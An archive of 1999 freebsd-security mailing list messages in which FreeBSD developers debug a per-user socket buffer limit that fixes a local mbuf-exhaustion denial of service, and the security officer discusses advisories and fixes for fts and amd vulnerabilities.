From owner-freebsd-security Sun Sep 5 1:57:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 8EEDF153EC for ; Sun, 5 Sep 1999 01:57:49 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id EAA84842; Sun, 5 Sep 1999 04:57:51 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 04:57:50 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: security@FreeBSD.org Subject: Re: another local DoS fix (PR ???) In-Reply-To: <199909050048.RAA63733@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would be nice to replace all access of fp with getfp() and have it release. It would make a lot of sense, and perhaps it could also be used with a lock system to make it closer to possible to push down the lock for this area. Processes could share file descriptors in SMP and not have race conditions there! I like lockmgr (maybe I'm insane...) but I'd like to know if there's anything faster that works. Didn't you say something about qlocks a long time ago? I wouldn't mind having a faster lock. -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! 
\ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:45:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 1EBE015348 for ; Sun, 5 Sep 1999 04:45:34 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA86864; Sun, 5 Sep 1999 07:44:32 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:44:32 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050110.SAA63819@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Matthew Dillon wrote: > > : > :Whatever's in login.conf? :) Would you mind helping me out with > :http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > :in some cases, which I need help tracking down. > :... > : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ > > Hmmm. I see a problem, but it may not be the cause of > your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be > sufficient to determine when a uip can be deleted, because a root > process can change it's uid (resulting in the old uip's proccnt > possibly going to 0) and a socket buffer can be set to 0-length > during a shutdown() operation, possibly causing ui_sbsize to go to > zero. Credentials are not the problem since the socket carries them around with it. Where can sb_hiwat be set to 0 in shutdown()? 
That wouldn't affect ui_sbsize if I missed it, but I'm pretty sure Id idn't miss it. > > Thus both fields may end up zero, a reference to the uip > may remain associated with the socket, and chgproccnt may > free the underlying uip. I don't think this can happen. > > I think what you need is a direct pointer reference to > the uip from the socket. This would require a ui_refcount > be kept on the uip, since ui_proccnt isn't really a > general ref count in of itself. > > I suspect that you may still hit the KASSERT, that there > is something we are still missing, but this should help. I still need to get that part working. Now I'm running into the problem (without these patches) that I get malloc: wrong bucket often, and I can't figure out why > > -Matt > Matthew Dillon > > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:52: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 464B315398 for ; Sun, 5 Sep 1999 04:51:58 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA86911; Sun, 5 Sep 1999 07:49:59 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:49:59 -0400 (EDT) From: "Brian F. 
Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050120.SAA63930@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Matthew Dillon wrote: > > Oh wait, I don't know which KASSERT() you were refering to. > > If you were refering to the first one (uip != NULL), I think it can occur as > I say. If it is refering to the second one, (uip->ui_sbsize >= 0), > then I'm not sure. That's the one I meant. > > Either way I would get rid of chgsbsize() and instead change the chgproccnt() > function to take a third argument, or make it even more general by passing > a field type and a delta to allow it to be scaled to other things. Probably a good idea, and I'll see how it works after I get the KASSERT() to stop tripping. > > It may be as simple as the KASSERT winding up being wrong. Doesn't seem like it at all. > > I would also instrument the panic portion of the KASSERT to > display more information, such as value of 'diff' and the > old value of ui_sbsize when uip is not NULL. That may make the > problem more obvious. I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 delta = -0x2000. > > -Matt > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! 
\ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:54:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id E052C14DF7 for ; Sun, 5 Sep 1999 04:54:31 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA87024; Sun, 5 Sep 1999 07:54:40 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:54:40 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Garrett Wollman Cc: freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050312.XAA26309@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Garrett Wollman wrote: > < said: > > >> [I wrote:] > >> What's not clear is: > >> > >> 1) At what level do you impose this limit? > > > Resource limit, definitely. > > You totally missed the point. Did you mean at socket creation time/sb allocation time, or actual _usage_ when the mbufs are being taken up? > > >> 2) Should the limit be statistical or exact? > > > Well, I have it exact it would seem. > > So you clearly haven't actually thought about what the right answer > is. > > >> 3) What is a sensible default value? > > > Whatever's in login.conf? > > Not at all helpful. How about the size necessary for send + rcv space for a TCP socket * number of maximum user processes? > > > http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > > in some cases, which I need help tracking down. 
> > I think if you're not going to implement the Right Thing, there's no > sense adding all that complexity -- just make a per-socket limit, and > require the sysadmin to tune his kernel to match the resource limits > established. Err... But some users need lots of of file descriptors and/or processes. That would still leave this hole open. > > -GAWollman > > -- > Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same > wollman@lcs.mit.edu | O Siem / The fires of freedom > Opinions not those of| Dance in the burning flame > MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 9:38:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 54A9614E77; Sun, 5 Sep 1999 09:38:20 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id JAA68325; Sun, 5 Sep 1999 09:37:48 -0700 (PDT) (envelope-from dillon) Date: Sun, 5 Sep 1999 09:37:48 -0700 (PDT) From: Matthew Dillon Message-Id: <199909051637.JAA68325@apollo.backplane.com> To: "Brian F. Feldman" Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> old value of ui_sbsize when uip is not NULL. That may make the :> problem more obvious. : :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 :delta = -0x2000. 
: : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ 0x1234 could be an indication of a reference to a data structure which has been freed. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 11:43:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id E63D414E51; Sun, 5 Sep 1999 11:43:32 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id OAA28577; Sun, 5 Sep 1999 14:42:44 -0400 (EDT) (envelope-from wollman) Date: Sun, 5 Sep 1999 14:42:44 -0400 (EDT) From: Garrett Wollman Message-Id: <199909051842.OAA28577@khavrinen.lcs.mit.edu> To: "Brian F. Feldman" Cc: Garrett Wollman , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: References: <199909050312.XAA26309@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Err... But some users need lots of of file descriptors and/or processes. > That would still leave this hole open. Don't give those resources to untrusted users. (And while you're at it, how about fixing the code that causes a panic here rather than failing gracefully?) -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 17:30:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 88A7014CEF for ; Sun, 5 Sep 1999 17:30:55 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA99066; Sun, 5 Sep 1999 20:28:22 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 20:28:22 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909051637.JAA68325@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 5 Sep 1999, Matthew Dillon wrote: > > :> old value of ui_sbsize when uip is not NULL. That may make the > :> problem more obvious. > : > :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 > :delta = -0x2000. > : > : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ > > 0x1234 could be an indication of a reference to a data structure > which has been freed. That would be 0xdeadc0de, but it wasn't actually 0x1234. It was something else somewhat similar. After tracking down the problem k6_mem.c has, I may look much more into this. 
> > -Matt > Matthew Dillon > > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:29:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0B92E1575A for ; Sun, 5 Sep 1999 19:28:59 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33033; Sun, 5 Sep 1999 20:28:10 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01416; Sun, 5 Sep 1999 20:27:13 -0600 (MDT) Message-Id: <199909060227.UAA01416@harmony.village.org> To: spork Subject: Re: Security Alerts Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 03 Sep 1999 13:44:42 EDT." References: Date: Sun, 05 Sep 1999 20:27:13 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message spork writes: : I've been reading bugtraq more often that this list (2500 messages in this : box..) and following a few FBSD exploits there (/etc/security / fts, the : mbuf DoS) and also a few where it's unclear as to whether FBSD is affected : (libtermcap, wu-ftpd, proftpd). The security officer handles this. Some advisories have been issued, more to follow. We don't issue advisories for problems that don't impact us. This means there will be no libtermcap nor cron because FreeBSD is not vulnerable to those exploits. 
: So what I'm wondering is whether the project is in need of someone to : digest, discuss, and regurgitate some of these things into security : advisories. I personally can appreciate the fact that an ordinary user or : admin might not be able to follow every bug that comes up on bugtraq or on : this list, and the idea of a central repository on the FreeBSD webpage : that is kept up to date and includes third-party software (esp. if it's in : common use, like wu) seems like a good one. Yes. It is an excellent idea. I'm looking for ways to help in advising on third party software used with freebsd, like wuftpd. : So I'm volunteering to write this stuff up, all I need is the go-ahead : from someone... Send me something privately and I'll let you know if you are on the right track. Warner FreeBSD Security Officer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:31:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 06D75157E1 for ; Sun, 5 Sep 1999 19:31:51 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33037; Sun, 5 Sep 1999 20:28:54 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01429; Sun, 5 Sep 1999 20:28:00 -0600 (MDT) Message-Id: <199909060228.UAA01429@harmony.village.org> To: dan.langille@dvl-software.com Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 04 Sep 1999 08:20:59 +1200." 
<199909032020.PAA24920@metis.host4u.net> References: <199909032020.PAA24920@metis.host4u.net> Date: Sun, 05 Sep 1999 20:28:00 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199909032020.PAA24920@metis.host4u.net> "Dan Langille" writes: : Just do it. The good thing about services such as the one you are : proposing is that it doesn't need anyone's "approval". If you think it's a : good idea, do it. People will use it. [If a place can't be found within the : FreeBSD pages, then I'll be quite happy to publish them on The : FreeBSD Diary.] Wrong. If it relates to Security and a FreeBSD stamp of approval, it needs my stamp of approval. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:33:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D80041575A for ; Sun, 5 Sep 1999 19:33:16 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33056; Sun, 5 Sep 1999 20:32:56 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01466; Sun, 5 Sep 1999 20:32:03 -0600 (MDT) Message-Id: <199909060232.UAA01466@harmony.village.org> To: "Jordan K. Hubbard" Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 03 Sep 1999 16:36:39 PDT." <67508.936401799@localhost> References: <67508.936401799@localhost> Date: Sun, 05 Sep 1999 20:32:03 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <67508.936401799@localhost> "Jordan K. 
Hubbard" writes: : More than actually generating advisories, something which our security : officers do a pretty reasonable job on, what we *really* need is : someone to test the existing advisories/random reports/etc and figure : out which exploits or DoS attacks are actually genuine. Quite a bit : of stuff gets sent to the security list and quite a bit of it often : has no applicability whatsoever to FreeBSD, leading to a situation : where security officers put it on the "test this at some point" pile : and that pile can get pretty deep. When faced with a "this has been : tested and the following releases of FreeBSD are vulnerable" sort of : message, however, they know that it's clearly a matter for immediate : attention and it gets "escallated" quite a bit. Yes. This is true. The "it might be a problem" messages tend to take too long, especially when it impacts -stable and not -current. I test as many of them as I can on FreeBSD-current, but testing them on -stable is much harder for me to do. Things have also been clogged up for me of late due to a variety of reasons which I've taken care of. The rest of the security backlog should be finished up this weekend... 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:35:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7702F1580D for ; Sun, 5 Sep 1999 19:35:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33065; Sun, 5 Sep 1999 20:34:56 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01490; Sun, 5 Sep 1999 20:34:03 -0600 (MDT) Message-Id: <199909060234.UAA01490@harmony.village.org> To: "N. N.M" Subject: Re: Tracing open ports on FreeBSD Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 04 Sep 1999 04:28:53 PDT." <19990904112855.43007.qmail@hotmail.com> References: <19990904112855.43007.qmail@hotmail.com> Date: Sun, 05 Sep 1999 20:34:03 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990904112855.43007.qmail@hotmail.com> "N. N.M" writes: : 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly : listening on my FreeBSD box. I don't know how this has happened, as they : were not open before. They are related to X11 as far as I know. But I had : already disabled XDM in /etc/ttys file. Could anybody tell me how I can : disable this stuff? Or how they could get opened and listening? ssh will create these. : 2) This is some time that two UDP ports have got opened as well. Again, I : don't have any idea on how they have got enabled. The ports are 1352 and : 2699. Generally, how I can trace when a port gets suddenly enabled? That I can't help you with. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:38: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4292B15814 for ; Sun, 5 Sep 1999 19:37:57 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33077; Sun, 5 Sep 1999 20:37:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01522; Sun, 5 Sep 1999 20:36:45 -0600 (MDT) Message-Id: <199909060236.UAA01522@harmony.village.org> To: Paul Hart Subject: Re: No patch yet for fts? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 01 Sep 1999 10:49:08 MDT." References: Date: Sun, 05 Sep 1999 20:36:45 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Paul Hart writes: : It looks like we've got kernel patches now to prevent core dumps from : following symbolic links which is excellent, but has anyone looked at : committing OpenBSD's fts(3) patch? See: A similar patch has been committed. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:40:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.actrix.gen.nz (mail2.actrix.gen.nz [203.96.16.37]) by hub.freebsd.org (Postfix) with ESMTP id E11ED1583A for ; Sun, 5 Sep 1999 19:40:11 -0700 (PDT) (envelope-from junkmale@xtra.co.nz) Received: from actrix.gen.nz (www@lemuria.actrix.gen.nz [203.96.16.20]) by mail.actrix.gen.nz (8.9.1/8.9.1) with SMTP id OAA29804; Mon, 6 Sep 1999 14:38:49 +1200 (NZST) From: "Dan Langille" Reply-To: junkmale@xtra.co.nz To: Warner Losh , spork , freebsd-security@FreeBSD.ORG Date: Mon, 6 Sep 1999 14:38:49 nzst Subject: Re: Security Alerts X-Mailer: DMailWeb Web to Mail Gateway 2.1t, http://netwinsite.com/top_mail.htm Message-id: <37d32939.64a9.0@actrix.gen.nz> X-User-Info: 202.37.52.5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: >In message <199909032020.PAA24920@metis.host4u.net> "Dan Langille" writes: >: Just do it. The good thing about services such as the one you are >: proposing is that it doesn't need anyone's "approval". If you think it's a >: good idea, do it. People will use it. [If a place can't be found within the >: FreeBSD pages, then I'll be quite happy to publish them on The >: FreeBSD Diary.] > >Wrong. If it relates to Security and a FreeBSD stamp of approval, it >needs my stamp of approval. Fair enough. I wasn't considering any aspect of "official" whatsoever. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:41:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 51C0C1580D for ; Sun, 5 Sep 1999 19:41:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33096; Sun, 5 Sep 1999 20:40:44 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01554; Sun, 5 Sep 1999 20:39:49 -0600 (MDT) Message-Id: <199909060239.UAA01554@harmony.village.org> To: Mohacsi Janos Subject: Re: amd buffer overflow some Linuxes, in FreeBSD too? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 02 Sep 1999 10:36:49 +0200." References: Date: Sun, 05 Sep 1999 20:39:49 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mohacsi Janos writes: : Hi, : There are some reports that amd is vulnerable to stack overflow : remote root exploit attack in some Linux distribution. : http://linuxtoday.com/stories/9440.html : Can somebody check whether the FreeBSD version also vulnerable? As : I see on the amd-dev list the amq -M code is the origin of the remote root : exploit. Fixes have been committed for this to FreeBSD -current, 3.2-stable and 2.2.8-stable. Advisory is in the works. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:44:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 09F7C14FC4 for ; Sun, 5 Sep 1999 19:44:12 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33109; Sun, 5 Sep 1999 20:43:12 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01593; Sun, 5 Sep 1999 20:42:19 -0600 (MDT) Message-Id: <199909060242.UAA01593@harmony.village.org> To: junkmale@xtra.co.nz Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 06 Sep 1999 14:38:49 +0100." <37d32939.64a9.0@actrix.gen.nz> References: <37d32939.64a9.0@actrix.gen.nz> Date: Sun, 05 Sep 1999 20:42:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37d32939.64a9.0@actrix.gen.nz> "Dan Langille" writes: : Fair enough. I wasn't considering any aspect of "official" whatsoever. If it is on the FreeBSD web pages, I really think that I'd at least need to approve the effort. I have no problem with doing that, I just don't want to read about it in a public list w/o even a heads up being sent to me. It lacks common courtesy. Maybe I'm just being grumpy. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 20:33:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from oracle.dsuper.net (oracle.dsuper.net [205.205.255.1]) by hub.freebsd.org (Postfix) with ESMTP id A875F15437; Sun, 5 Sep 1999 20:33:16 -0700 (PDT) (envelope-from bmilekic@dsuper.net) Received: from oracle.dsuper.net (oracle.dsuper.net [205.205.255.1]) by oracle.dsuper.net (8.9.3/8.9.3) with ESMTP id XAA22849; Sun, 5 Sep 1999 23:33:06 -0400 (EDT) Date: Sun, 5 Sep 1999 23:33:06 -0400 (EDT) From: Bosko Milekic To: freebsd-hackers@freebsd.org Cc: freebsd-security@freebsd.org Subject: mbuf shortage situations Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This post is somewhat in relation to the "local DoS" thread started on --security a few days ago. To slightly put things back into context: The panic() signaling "out of mbuf clusters" is a result of the initial MGET failing, calling m_retry, and failing again. Since we seem to be okay with waiting (e.g.: M_WAIT), and we fail in getting an mbuf cluster, m_retry panic()s. As far as what I've understood from glancing at some OpenBSD and NetBSD code, I'm pretty sure that they both handle this situation the same way we handle it if the m_retry is called with M_DONTWAIT, which is to return null to MGET, which would consequently set the mbuf structure pointer (in this case, struct mbuf *m) to null. This would probably result in packet loss. 
The only reason that I see for which we would actually panic() in this situation (as opposed to suffer the packet loss) is if we get to the point where we're losing packets because some script kid starts up something that will eat up sockbuf space and continuously fork, then we would lose all remote access to the machine in question (since all packets would be dropped) and we wouldn't really mind a panic() for obvious practical reasons. In any case, I, personally, would prefer to suffer packet loss as opposed to a panic (especially now that Brian is in the process of writing diffs that will allow us to limit socket buffer space per UID through login.conf!) Having MGET store that null (e.g. fail as opposed to panic) on a M_WAIT seems fairly easy to fix, and would probably require some patching that would ensure that the packet loss is handeled relatively 'cleanly' (probably some debugging), but I wouldn't mind doing this. However, I'd like to know if there are objections to doing this or, in fact, if there are any suggestions on how to handle mbuf shortage situations (aside from just limiting -- although limiting is in itself a good solution and I'm glad that Brian F. is working on that). Cheers, Bosko. /* * Bosko Milekic http://www.dsuper.net/~bmilekic/ * "A method of solution is perfect if we can foresee from the start, and * even prove, that by following that method we shall obtain our aim." 
 */

From: Matthew Dillon
Date: Sun, 5 Sep 1999 21:14:42 -0700 (PDT)
Message-Id: <199909060414.VAA70569@apollo.backplane.com>
To: "Brian F. Feldman"
Cc: Garrett Wollman, Nick Hibma, FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD

:On Sun, 5 Sep 1999, Matthew Dillon wrote:
:
:> :> :> old value of ui_sbsize when uip is not NULL. That may make the
:> :> problem more obvious.
:> :
:> :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234
:> :delta = -0x2000.
:> :
:> : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \
:>
:> 0x1234 could be an indication of a reference to a data structure
:> which has been freed.
